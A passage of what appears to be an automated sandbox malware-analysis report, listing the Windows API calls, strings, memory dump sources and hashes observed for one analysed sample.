                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                              • Instruction ID: 9b085dde63047e27e5e53d38eedba715f6213047395f2f80660f440468e893c2
                                              • Opcode Fuzzy Hash: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                              • Instruction Fuzzy Hash: C1E06578200B548FE7329F25D504743BAE8EF00304F008A6CE445CB250E7B8E444CBA1
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00381775
                                                • Part of subcall function 003BBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0038195E,?), ref: 003BBFFE
                                                • Part of subcall function 003BBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003BC010
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0038196D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: 4398304e893b1303709698f936ac2407ccff6127a3d82da290bbd5c8e46ac087
                                              • Instruction ID: b2e32753a39ed774c4c2bf876384e1d04471f604d5f45047a8739ebad8c368c7
                                              • Opcode Fuzzy Hash: 4398304e893b1303709698f936ac2407ccff6127a3d82da290bbd5c8e46ac087
                                              • Instruction Fuzzy Hash: 55F0C971801209DFDB16EB91C984AECBBFCAB08305F5504D9F102A64A0D7755F85DF64
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C596E
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C5981
                                                • Part of subcall function 003A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 6516733cc7d3ad8d1835a1dc5329e26a359fd5bd12763b16948117cdcb5bf0ab
                                              • Instruction ID: 741216a036117357188edec97117538571ba81d9c0a850ca3cc9812bf59c3f7d
                                              • Opcode Fuzzy Hash: 6516733cc7d3ad8d1835a1dc5329e26a359fd5bd12763b16948117cdcb5bf0ab
                                              • Instruction Fuzzy Hash: D9D0C931384711BBE669AB709C0BFE66A29AB11B51F000825B34AEA1D0C9E4A800C754
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C59AE
                                              • PostMessageW.USER32(00000000), ref: 003C59B5
                                                • Part of subcall function 003A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 5623709e72e038cbc720c70ed67a8b4977e7f04c3e5bb20f2001d64e51ffdf3c
                                              • Instruction ID: d65c8bf8933b3572a00c06dedd6d6971cd778390da86d4e5706401dc655f20c7
                                              • Opcode Fuzzy Hash: 5623709e72e038cbc720c70ed67a8b4977e7f04c3e5bb20f2001d64e51ffdf3c
                                              • Instruction Fuzzy Hash: 29D0C9313807117BE66AAB709C0BFD66629AB16B51F000825B34AEA1D0C9E4A800C758